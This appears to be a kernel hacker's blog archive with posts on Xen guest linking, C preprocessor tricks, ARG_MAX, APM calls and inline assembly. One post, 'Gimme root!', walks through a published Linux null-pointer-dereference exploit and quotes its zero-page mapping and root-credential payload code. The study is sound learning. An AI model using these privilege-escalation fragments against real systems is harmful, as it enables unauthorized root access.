gcc / ld madness

November 7, 2012

So, I started reading [The Definitive Guide to the Xen Hypervisor] (again :P), and I thought it would be fun to start with the example guest kernel, provided by the author, and extend it a bit (ye, there’s mini-os already in extras/, but I wanted to struggle with all the peculiarities of extended inline asm, x86_64 asm, linker scripts, C macros etc, myself :P).

After doing some reading about x86_64 asm, I ‘ported’ the example kernel to 64bit, and gave it a try. And of course, it crashed. While I was responsible for the first couple of crashes (for which btw, I can write at least 2-3 additional blog posts :P), I got stuck with this error:

traps.c:470:d100 Unhandled bkpt fault/trap [#3] on VCPU 0 [ec=0000]
RIP:    e033:<0000000000002271>

when trying to boot the example kernel as a domU (under xen-unstable).

0×2000 is the address where XEN maps the hypercall page inside the domU’s address space. The guest crashed when trying to issue any hypercall (HYPERCALL_console_io in this case). At first, I thought I had screwed up with the x86_64 extended inline asm, used to perform the hypercall, so I checked how the hypercall macros were implemented both in the Linux kernel (wow btw, it’s pretty scary), and in the mini-os kernel. But, I got the same crash with both of them.

After some more debugging, I made it work. In my Makefile, I used gcc to link all of the object files into the guest kernel. When I switched to ld, it worked. Apparently, when using gcc to link object files, it calls the linker with a lot of options you might not want. Invoking gcc using the -v option will reveal that gcc calls collect2 (a wrapper around the linker), which then calls ld with various options (certainly not only the ones I was passing to my ‘linker’). One of them was –build-id, which generates a .note.gnu.build-id” ELF note section in the output file, which contains some hash to identify the linked file.

Apparently, this note changes the layout of the resulting ELF file, and ‘shifts’ the .text section to 0×30 from 0×0, and hypercall_page ends up at 0×2030 instead of 0×2000. Thus, when I ‘called’ into the hypercall page, I ended up at some arbitrary location instead of the start of the specific hypercall handler I was going for. But it took me quite some time of debugging before I did an objdump -dS [kernel] (and objdump -x [kernel]), and found out what was going on.

The code from bootstrap.x86_64.S looks like this (notice the .org 0×2000 before the hypercall_page global symbol):

        .text
        .code64
	.globl	_start, shared_info, hypercall_page
_start:
	cld
	movq stack_start(%rip),%rsp
	movq %rsi,%rdi
	call start_kernel

stack_start:
	.quad stack + 8192
	
	.org 0x1000
shared_info:
	.org 0x2000

hypercall_page:
	.org 0x3000	

One solution, mentioned earlier, is to switch to ld (which probalby makes more sense), instead of using gcc. The other solution is to tweak the ELF file layout, through the linker script (actually this is pretty much what the Linux kernel does, to work around this):

OUTPUT_FORMAT("elf64-x86-64", "elf64-x86-64", "elf64-x86-64")
OUTPUT_ARCH(i386:x86-64)
ENTRY(_start)

PHDRS {
	text PT_LOAD FLAGS(5);		/* R_E */
	data PT_LOAD FLAGS(7);		/* RWE */
	note PT_NOTE FLAGS(0);		/* ___ */
}

SECTIONS
{
	. = 0x0;			/* Start of the output file */
	_text = .;			/* Text and ro data */
	.text : {
		*(.text)
	} :text = 0x9090 

	_etext = .;			/* End ot text section */

	.rodata : {			/* ro data section */
		*(.rodata)
		*(.rodata.*)
	} :text

	.note : { 
		*(.note.*)
	} :note

	_data = .;
	.data : {			/* Data */
		*(.data)
	} :data

	_edata = .;			/* End of data section */	
}

And now that my kernel boots, I can go back to copy-pasting code from the book … erm hacking. :P

Disclaimer: I’m not very familiar with lds scripts or x86_64 asm, so don’t trust this post too much. :P

Abusing the C preprocessor

August 29, 2011

Both tricks shown here are related with a change (by Peter Zijlstra) in the kmap_atomic() and kunmap_atomic() macros/functions. LWN has an excellent article about what that change involved. It basically ‘dropped’ support for atomic kmap slots, switching to a more general stack-based approach.

Now with this change, the number of arguments passed to the kmap_atomic() function changed too, and thus you end up with a huge patch covering all the tree, which fixed the issue (changing kmap_atomic(p, KM_TYPE) to kmap_atomic(p)).

But there was another way to go. Some C preprocessor magic.

#define kmap_atomic(page, args...) __kmap_atomic(page)

Yes, the C preprocessor supports va_args. :)
(which I found out when going through the reptyr code, but I’ll talk about it in an other post.)

Today, I saw a thread at the lkml, which actually did the cleanup I described. Andrew Morton responded:

I’m OK with cleaning all these up, but I suggest that we leave the back-compatibility macros in place for a while, to make sure that various stragglers get converted. Extra marks will be awarded for working out how to make unconverted code generate a compile warning

And Nick Bowler responded with a very clever way to do this (which involved abusing heavily the C preprocessor :P):

  #include <stdio.h>

  int foo(int x)
  {
     return x;
  }

  /* Deprecated; call foo instead. */
  static inline int __attribute__((deprecated)) foo_unconverted(int x, int unused)
  {
     return foo(x);
  }

  #define PASTE(a, b) a ## b
  #define PASTE2(a, b) PASTE(a, b)
  
  #define NARG_(_9, _8, _7, _6, _5, _4, _3, _2, _1, n, ...) n
  #define NARG(...) NARG_(__VA_ARGS__, 9, 8, 7, 6, 5, 4, 3, 2, 1, 0)

  #define foo1(...) foo(__VA_ARGS__)
  #define foo2(...) foo_unconverted(__VA_ARGS__)
  #define foo(...) PASTE2(foo, NARG(__VA_ARGS__)(__VA_ARGS__))

  int main(void)
  {
    printf("%d\n", foo(42));
    printf("%d\n", foo(54, 42));
    return 0;
  }

The actual warning is printed due to the deprecated attribute of the foo_unconverted() function.

The fun part, however, is how we get to use the foo ‘identifier’/name to call either foo() or foo_uncoverted() depending on the number of arguments given. :)

The trick is to use the __VA_ARGS__ to ‘shift’ the numbers 9-0 in the NARG macro, so that when calling the NARG_ macro, _9 will match with the first __VA_ARGS__ argument, _8 with the second etc, and so n will match with actual number of arguments (I’m not sure I described it very well, but if you try doing it by hand, you’ll understand how it’s working).

Now that we have the number of arguments given to foo, we use the PASTE macro to ‘concatenate’ the number of the arguments with the function name, and the actual arguments given, and call the appropriate wrapper macro (foo1, foo2 etc).

Another interesting thing, which I didn’t know, is about argument expansion in macros. For macros that concatenate (##) or stringify (#) the arguments are not expanded beforehand. That’s why we have to use PASTE2 as a wrapper, to get the NARG() argument/macro fully expanded before concatenating.

Ok, C code can get at times a bit obfuscated, and yes you don’t have type safety etc etc, but, man, you can be really creative with the C language (and the C preprocessor)!
And the Linux kernel development(/-ers) prove just that. :)

For some reason, whenever I open up the Wikipedia, I end up with tons of tabs in my web browser, and usually the tabs are completely unrelated to each other. :P

Yesterday, I ended up looking the xargs Wikipedia article, and there I found an interesting note:

Under the Linux kernel before version 2.6.23, arbitrarily long lists of parameters could not be passed to a command,[1] so xargs breaks the list of arguments into sublists small enough to be acceptable.

Along with a link to the GNU coreutils FAQ.

And from there a link to the Linux Kernel mainline git repository.

After a bit of googling, I found a very nice article describing in great detail the ARG_MAX variable, which defines the maximum length of the arguments passed to execve.

Traditionally Linux used a hardcoded:

#define MAX_ARG_PAGES 32

to limit the total size of the arguments passed to the execve() (including the size of the ‘environment’). That limited the maxlen of the arguments passed to about 128KB (minus the size of the ‘environment’).

(Note: actually, very early Linux kernels did not have support for ARG_MAX and didn’t use MAX_ARG_PAGES, but back then I was probably 2-3 years old, so it’s ancient history for me :P)

With Linux-2.6.33, this hardcoded limit was removed. Actually it was replaced by a more ‘flexible’ limit. The maximum length of the arguments can now be as big as the 1/4th of the user-space stack. For example, in my desktop, using ulimit -s I get a stack size of 8192KB, which means 2097152 maxlength for the arguments passed. The same value you can obtain by using getconf. Now, if I increase the soft limit on the stack size, the maxlength allowed will also increase, although with a 8192KB soft limit, the ‘ARGS_MAX’ is already big enough. Two new limits where also introduced, one on the maxlength of each argument (equal to PAGE_SIZE * 32), and the total number of arguments, equal to 0x7FFFFFFF, or as big as a signed integer can be.

Linux headers however use the MAX_ARG_STRLEN, I think, as the ARG_MAX limit, which forces libc to #undef it in its own header files. I’m not sure, since I haven’t looked into code yet, but at least for Linux, ARG_MAX is not statically defined anymore by libc (ie in a header file), but libc computes its value from the userspace stack size.
(edit: that’s indeed how it works for >=linux-2.6.33 — code in sysdeps/unix/sysv/linux/sysconf.c:

    case _SC_ARG_MAX:
  #if __LINUX_KERNEL_VERSION < 0x020617
        /* Determine whether this is a kernel 2.6.23 or later.  Only
           then do we have an argument limit determined by the stack
           size.  */
        if (GLRO(dl_discover_osversion) () >= 0x020617)
  #endif
          {
            /* Use getrlimit to get the stack limit.  */
            struct rlimit rlimit;
            if (__getrlimit (RLIMIT_STACK, &rlimit) == 0)
              return MAX (legacy_ARG_MAX, rlimit.rlim_cur / 4);
          }
  
        return legacy_ARG_MAX;

).

And the kernel code that enforces that limit:

               struct rlimit *rlim = current->signal->rlim;
               unsigned long size = bprm->vma->vm_end - bprm->vma->vm_start;

               /*
                * Limit to 1/4-th the stack size for the argv+env strings.
                * This ensures that:
                *  - the remaining binfmt code will not run out of stack space,
                *  - the program will have a reasonable amount of stack left
                *    to work from.
                */
               if (size > rlim[RLIMIT_STACK].rlim_cur / 4) {
                       put_page(page);
                       return NULL;
               }

The whole kernel patch is a bit complicated for me to understand, since I don’t have digged much into kernel mm code, but from what I understand, instead of copying the arguments into pages, and then mapping those pages into the new process address space, it setups a new mm_struct, and populates it with a stack VMA. It then copies the arguments into this VMA (expanding it as needed), and then takes care to ‘position’ it correctly into the new process. But since I’m not very familiar with the Linux Kernel mm API, it’s very likely that what I said is totally wrong (I really have to read the mm chapters from “Understanding the Linux Kernel” :P).

A couple of months ago I found out about ketchup (credits to Daniel Drake, and his blog).

ketchup is an awesome utility/script, written by Matt Mackall in Python, which makes it very easy to manage kernel sources. You can very easily upgrade to a newer kernel version, downgrade to older releases, and even switch between different patchsets. The ketchup ebuild I found in Portage (and in every Linux distro I know about) was fetching the original and out-of-date version of ketchup. Steven Rostedt had pulled the original ketchup code (v0.9) into his git repo @ kernel.org. However, there were no commits/updates to ketchup for 1-2 years, I think.

So, I decided to cleanup some of the old trees that ketchup supported, but were no longer maintained, and add support for new trees (or some updated ‘versions’ of the old trees). I sent the patches to Steven Rostedt, and he proposed that I take over and maintain ketchup. :)

I cloned the ketchup git repo to Github, applied the patches I’d written, plus quite a lot of patches that the Debian ketchup package provided.

Now, with the Linux-3.0 release approaching, I tried to add (at least) partial support for the new 2 digit version numbers, but there are still some issues, which will hopefully get resolved once Linux-3.0 gets released, and the new versioning scheme gets standarized (for example the EXTRAVERSION Makefile variable will probably not get removed from 3.0, as it breaks some userspace utils, like uptime etc from procps utils, some depmod issues etc).

The new code for 3.x kernels is currently in the linux-3 branch, from which I took a snapshot and pushed it to Portage as dev-util/ketchup-1.1_beta. I will hopefully merge it back with master, after the first -stable release comes out (Linux-3.0.1), just to make sure that everything works.

Feel free to give it a try, and report any bugs/issues.

Thanks to the “Understanding the Linux Kernel” I spent several hours trying to understand the APM code used to ‘call’ the APM Protected Mode 32-bit Interface Connect.
Of course APM is deprecated since ages I think, but I was curious. :P

As the APM 1.2 specification states:

The APM BIOS 32-bit protected mode interface requires 3 consecutive
selector/segment descriptors for use as 32-bit code, 16-bit code, and data segments,
respectively. Both 32-bit and 16-bit code segment descriptors are necessary so the
APM BIOS 32-bit interface can call other BIOS routines in a 16-bit code segment if
necessary. The caller must initialize these descriptors using the segment base and
length information returned from this call to the APM BIOS. These selectors may
either be in the GDT or LDT, but must be valid when the APM BIOS is called in
protected mode.

So, at boot time, Linux will query the BIOS/APM for information about the base and length of the segments that APM code uses(query_apm_bios()):

        /* 32-bit connect */
	ireg.al = 0x03;
	intcall(0x15, &ireg, &oreg);

	boot_params.apm_bios_info.cseg        = oreg.ax;
	boot_params.apm_bios_info.offset      = oreg.ebx;
	boot_params.apm_bios_info.cseg_16     = oreg.cx;
	boot_params.apm_bios_info.dseg        = oreg.dx;
	boot_params.apm_bios_info.cseg_len    = oreg.si;
	boot_params.apm_bios_info.cseg_16_len = oreg.hsi;
	boot_params.apm_bios_info.dseg_len    = oreg.di;

These are the values that Linux will use to set-up the appropriate segments in the Global Descriptor Table(GDT).

	/*
	 * Set up the long jump entry point to the APM BIOS, which is called
	 * from inline assembly.
	 */
	apm_bios_entry.offset = apm_info.bios.offset;
	apm_bios_entry.segment = APM_CS;
	/*
	 * The APM 1.1 BIOS is supposed to provide limit information that it
	 * recognizes.  Many machines do this correctly, but many others do
	 * not restrict themselves to their claimed limit.  When this happens,
	 * they will cause a segmentation violation in the kernel at boot time.
	 * Most BIOS's, however, will respect a 64k limit, so we use that.
	 *
	 * Note we only set APM segments on CPU zero, since we pin the APM
	 * code to that CPU.
	 */
	gdt = get_cpu_gdt_table(0);
	set_desc_base(&gdt[APM_CS >> 3],
		 (unsigned long)__va((unsigned long)apm_info.bios.cseg << 4));
	set_desc_base(&gdt[APM_CS_16 >> 3],
		 (unsigned long)__va((unsigned long)apm_info.bios.cseg_16 << 4));
	set_desc_base(&gdt[APM_DS >> 3],
		 (unsigned long)__va((unsigned long)apm_info.bios.dseg << 4));

So, now the APM segments(their descriptors) are ready to use.

The code used to make an APM BIOS call looks like this:

static inline void apm_bios_call_asm(u32 func, u32 ebx_in, u32 ecx_in,
					u32 *eax, u32 *ebx, u32 *ecx,
					u32 *edx, u32 *esi)
{
	/*
	 * N.B. We do NOT need a cld after the BIOS call
	 * because we always save and restore the flags.
	 */
	__asm__ __volatile__(APM_DO_ZERO_SEGS
		"pushl %%edi\n\t"
		"pushl %%ebp\n\t"
		"lcall *%%cs:apm_bios_entry\n\t"
		"setc %%al\n\t"
		"popl %%ebp\n\t"
		"popl %%edi\n\t"
		APM_DO_POP_SEGS
		: "=a" (*eax), "=b" (*ebx), "=c" (*ecx), "=d" (*edx),
		  "=S" (*esi)
		: "a" (func), "b" (ebx_in), "c" (ecx_in)
		: "memory", "cc");
}

It took me a while to figure out the long jump.

lcall *%%cs:apm_bios_entry

because apm_bios_entry is defined as:

static struct {
        unsigned long   offset;
        unsigned short  segment;
} apm_bios_entry;

At first I though that the struct should be defined the other way around(first the segment and then the offset).
I experimented a bit with inline asm, and after lots of segmentation faults, and some time going over Intel x86 manuals about the ljmp instruction, I figured it out.

Well, I think it took much much longer than it should to understand was going on. :S

The ljmp expects a mem16:mem32 operand, where mem16 is the segment, and mem32 the offset.
And that’s exactly how the struct apm_bios_entry is stored in memory.
However, as I ‘read’ mem16:mem32, I thought that mem16 should be stored before mem32. :S

And thus I lost several hours writing and experimenting with segfaulting C code. :P
For something pretty obvious…

my first kernel patch!

March 11, 2011

Here it is! :P

Well, the patch itself isn’t a big deal, since I didn’t write any code. It was a cleanup of asm-offsets.

Afaik, Linux has quite a lot of assembly code, which needs the offsets of various struct members. Of course, assembly code(or even toplevel inline assembly) cannot use the offsetof marco. That’s also the case for some C constants, eg:

#define PAGE_SIZE (1UL << PAGE_SHIFT)) 

Thus, these offsets and constants are ‘calcualted’ at build time as ‘absolute values’ so that gas will be ok. :P
Using the macros defined in incldue/linux/kbuild.h

#define DEFINE(sym, val) \
        asm volatile("\n->" #sym " %0 " #val : : "i" (val))

#define BLANK() asm volatile("\n->" : : )

#define OFFSET(sym, str, mem) \
	DEFINE(sym, offsetof(struct str, mem))

#define COMMENT(x) \
	asm volatile("\n->#" x)

the asm-offsets.c is used to create a ‘special’ asm fle, which is then parsed by the kernel build system, in order to create the include/generated/asm-offsets.h file.

However, a patch introduced two new macros in include/linux/const.h

#ifdef __ASSEMBLY__
#define _AC(X,Y)	X
#define _AT(T,X)	X
#else
#define __AC(X,Y)	(X##Y)
#define _AC(X,Y)	__AC(X,Y)
#define _AT(T,X)	((T)(X))
#endif

so that some constants defined in C work with gas too.

And now, the PAGE_SIZE is defined as

#define PAGE_SIZE       (_AC(1,UL) << PAGE_SHIFT

and thus, the PAGE_SIZE_asm defined in x86/asm-offsets.c, and used in some places in x86 code was no longer needed(that’s also the case with PAGE_SHIFT and THREAD_SIZE).

So, I deleted PAGE_SIZE_asm/PAGE_SHIFT_asm/THREAD_SIZE_asm from x86/kernel/asm-offsets.c, and replaced them with their non-asm counterparts, in the code that used them.

I posted it to lkml(after some hours experimenting with git format-patch and git send-email :P), and it got accepted. :)

Here are some things I learned while reading the Linux kernel source code(some of which took me a couple of hours of googling and searching through documentation, git commit posts, threads on lkml etc etc :P).

1)You cannot write extended toplevel inline assembly, ie when you want to use extended inline assembly to pass the value of some C variables or constants, you can only do it inside a function. And as I found out, someone had filed a bug at the GCC bugzilla. So something like this

static const char foo[] = "Hello, world!";
enum { bar = 17 };
asm(".pushsection baz; .long %c0, %c1, %c2; .popsection"
    : : "i" (foo), "i" (sizeof(foo)), "i" (bar));

won’t work.

2)I didn’t search very much the documentation about inline asm, but I couldn’t find what’s the difference between %c0 and %0. It’s used at the example code above, and in a kernel macro I saw. I understood that it had to do with some ‘constant casting’, but I couldn’t find anywhere the exact difference. So I wrote a simple piece of code to clarify that:

main() {
	asm("movl %0, %%eax; movl %c0, %%eax"
		:: "i" (0xff) );
}

and after

gcc -S foo.c

I get:

movl $255, %eax
movl 255, %eax

So %0 is used when we want an integer constant to be used as an immediate value in instructions like mov, add etc, which means that it should be prefixed with $, while %c0 is used when we want the number itself for instructions like .long, .size etc which demand an absolute expression/value as ‘arguments’.

3) When using the section attribute on a variable, in order to change the section it belongs, you cannot change the section’s type to nobits, it’ll be progbits by default. progbits means that the section will actually get space allocated inside the executable(like text and data sections), in contrast to nobits sections like bss for example.
i.e. you can’t do this

static char foo __attribute__(section("bar", nobits));

4)I also found out about the pushsection and popsections asm directives, which manipulate the ELF section stack, and seem to be very useful in certain occasions. pushsection obviously pushes the current section to the section stack, and replace it with the argument passed to the directive, while popsection replaces the current section with the section on top of the section stack.

5)Finally the ‘used’ attribute, which indicates that the symbol(function in our case) is actually used/called/referenced even if the compiler can’t ‘see’ it(otherwise I think that the compiler optimizations would omit code generation for that function).

And now a kernel macro which includes all of the above:

/*
 * Reserve space in the brk section.  The name must be unique within
 * the file, and somewhat descriptive.  The size is in bytes.  Must be
 * used at file scope.
 *
 * (This uses a temp function to wrap the asm so we can pass it the
 * size parameter; otherwise we wouldn't be able to.  We can't use a
 * "section" attribute on a normal variable because it always ends up
 * being @progbits, which ends up allocating space in the vmlinux
 * executable.)
 */
#define RESERVE_BRK(name,sz)						\
	static void __section(.discard.text) __used			\
	__brk_reservation_fn_##name##__(void) {				\
		asm volatile (						\
			".pushsection .brk_reservation,\"aw\",@nobits;" \
			".brk." #name ":"				\
			" 1:.skip %c0;"					\
			" .size .brk." #name ", . - 1b;"		\
			" .popsection"					\
			: : "i" (sz));					\
	}

And a bit more detailed explanation from the git commit

The C definition of RESERVE_BRK() ends up being more complex than
one would expect to work around a cluster of gcc infelicities:

The first attempt was to simply try putting __section(.brk_reservation)
on a variable. This doesn’t work because it ends up making it a
@progbits section, which gets actual space allocated in the vmlinux
executable.

The second attempt was to emit the space into a section using asm,
but gcc doesn’t allow arguments to be passed to file-level asm()
statements, making it hard to pass in the size.

The final attempt is to wrap the asm() in a function to allow
it to have arguments, and put the function itself into the
.discard section, which vmlinux*.lds drops entirely from the
emitted vmlinux.

Another thing to notice is that the wrapper function is put in the .discard.text section, which according to the vmlinux.lds(the linker script used to generate/link the vmlinux executable) will be discarded and thus not included in the executable.
From scripts/module-common.lds:

/*
 * Common module linker script, always used when linking a module.
 * Archs are free to supply their own linker scripts.  ld will
 * combine them automatically.
 */
SECTIONS {
	/DISCARD/ : { *(.discard) }
}

The purpose of the RESERVE_BRK macro, and the brk-like allocator for very early memory allocations needed during the kernel boot process is an interesting story too(which means another post coming soon)! ;)

Coolest hack/trick ever!

February 17, 2011

Some time ago, I wrote about lguest, a minimal x86 hypervisor for the Linux Kernel, which is mainly used for experimentation, and learning stuff about hypervisors, operating systems, even computer architecture/ISA(x86 in particular).

Today I cloned the git repo for the lguest64 port, and I started browsing through the documentation and the code. In the launcher code(the program that initializes/sets up and launches a new guest kernel), I saw the coolest programming hack/trick I’ve seen in a long time. :P

/*L:170 Prepare to be SHOCKED and AMAZED.  And possibly a trifle nauseated.
 *
 * We know that CONFIG_PAGE_OFFSET sets what virtual address the kernel expects
 * to be.  We don't know what that option was, but we can figure it out
 * approximately by looking at the addresses in the code.  I chose the common
 * case of reading a memory location into the %eax register:
 *
 *  movl <some-address>, %eax
 *
 * This gets encoded as five bytes: "0xA1 <4-byte-address>".  For example,
 * "0xA1 0x18 0x60 0x47 0xC0" reads the address 0xC0476018 into %eax.
 *
 * In this example can guess that the kernel was compiled with
 * CONFIG_PAGE_OFFSET set to 0xC0000000 (it's always a round number).  If the
 * kernel were larger than 16MB, we might see 0xC1 addresses show up, but our
 * kernel isn't that bloated yet.
 *
 * Unfortunately, x86 has variable-length instructions, so finding this
 * particular instruction properly involves writing a disassembler.  Instead,
 * we rely on statistics.  We look for "0xA1" and tally the different bytes
 * which occur 4 bytes later (the "0xC0" in our example above).  When one of
 * those bytes appears three times, we can be reasonably confident that it
 * forms the start of CONFIG_PAGE_OFFSET.
 *
 * This is amazingly reliable. */
static unsigned long intuit_page_offset(unsigned char *img, unsigned long len)
{
	unsigned int i, possibilities[256] = { 0 };

	for (i = 0; i + 4 < len; i++) {
		/* mov 0xXXXXXXXX,%eax */
		if (img[i] == 0xA1 && ++possibilities[img[i+4]] > 3)
			return (unsigned long)img[i+4] << 24;
	}
	errx(1, "could not determine page offset");
}

It’s very well commented, and so I don’t think there’s something I could explain any better.
Very very nice trick!
‘Prepare to be shocked and amazed!’ ;)

Gimme root!

February 17, 2011

I was looking at the Linux Kernel null-pointer dereferencing exploit in the /dev/net/tun, aka Cheddar Bay :P, written by Brad Spengler, and I came along some things I hadn’t seen before.

In the pa__init function of the exploit, we try to mmap the zero page, and then we set it up accordingly in order to redirect to our “gimme root” code. :P

The piece of code for the mmap looks like this:

	if ((personality(0xffffffff)) != PER_SVR4) {
		mem = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
		if (mem != NULL) {
			fprintf(stdout, "UNABLE TO MAP ZERO PAGE!\n");
			return 1;
		}
	} else {
		ret = mprotect(NULL, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC);
		if (ret == -1) {
			fprintf(stdout, "UNABLE TO MPROTECT ZERO PAGE!\n");
			return 1;
		}
	}

Thus, I learned that the SVR4 personality(generally when the MMAP_PAGE_ZERO flag is set in the personality) maps the zero page, and fills it with zeros, and that’s why we use mprotect for SVR4, instead of mmap, since zero page is already mapped.

The gimme-root code, was also fun(spender did he best to mock SELinux :P). However the code that actually gives us root credentials is only 3 lines:

	if (commit_creds && init_cred) {
		/* hackish usage increment */
		*(volatile int *)(init_cred) += 1;
		commit_creds(init_cred);
		got_root = 1;
	}

where init_cred is the credential struct used by init(aka root :P), and commit_creds points to the kernel symbol/function which is used to manage credentials. spender gets the addresses of those symbols by parsing /proc/kallsyms. However, it seems that the init_cred symbol/struct is not exported, so instead maybe we could craft a new cred struct with uid/gid=0 and then call prepare_creds/commit_creds.

Afaik, this credential ‘framework’ was introduced with Linux Kernel 2.6.30, so spender provides another ‘old-school’ :P way to get root credentials, in older kernels:

/* for RHEL5 2.6.18 with 4K stacks */
static inline unsigned long get_current(void)
{
	unsigned long current;

	asm volatile (
	" movl %%esp, %%eax;"
	" andl %1, %%eax;"
	" movl (%%eax), %0;"
	: "=r" (current)
	: "i" (0xfffff000)
	);
	return current;
}

static void old_style_gimme_root(void)
{
	unsigned int *current;
	unsigned long orig_current;

	current = (unsigned int *)get_current();
	orig_current = (unsigned long)current;

	while (((unsigned long)current < (orig_current + 0x1000)) &&
		(current[0] != our_uid || current[1] != our_uid ||
		 current[2] != our_uid || current[3] != our_uid))
		current++;

	if ((unsigned long)current >= (orig_current + 0x1000))
		return;

	current[0] = current[1] = current[2] = current[3] = 0; // uids
	current[4] = current[5] = current[6] = current[7] = 0; // gids

	got_root = 1;

	return;
}

which gets the current task’s stack, searches for our uids/gids, and then it sets them to 0(aka root :P).

The exploit itself is brilliant, and LWN has two very nice articles, which explain how the exploit actually works(although spender has commented more than enough–commenting on Linux Kernel security, full disclosure of security bugs etc etc).

I wanted to understand how the code for the early page tables that the kernel builds just before paging is enabled, works. x86 AT&T assembly isn’t very easy to understand, but it’s fun though. :P

page_pde_offset = (__PAGE_OFFSET >> 20);

        movl $pa(__brk_base), %edi
        movl $pa(swapper_pg_dir), %edx
        movl $PTE_IDENT_ATTR, %eax
10:
        leal PDE_IDENT_ATTR(%edi),%ecx          /* Create PDE entry */
        movl %ecx,(%edx)                        /* Store identity PDE entry */
        movl %ecx,page_pde_offset(%edx)         /* Store kernel PDE entry */
        addl $4,%edx
        movl $1024, %ecx
11:
        stosl
        addl $0x1000,%eax
        loop 11b
        /*
         * End condition: we must map up to the end + MAPPING_BEYOND_END.
         */
        movl $pa(_end) + MAPPING_BEYOND_END + PTE_IDENT_ATTR, %ebp
        cmpl %ebp,%eax
        jb 10b
        addl $__PAGE_OFFSET, %edi
        movl %edi, pa(_brk_end)
        shrl $12, %eax
        movl %eax, pa(max_pfn_mapped)

Here’s the piece of code.
Have fun! :)

Follow

Get every new post delivered to your Inbox.

Join 276 other followers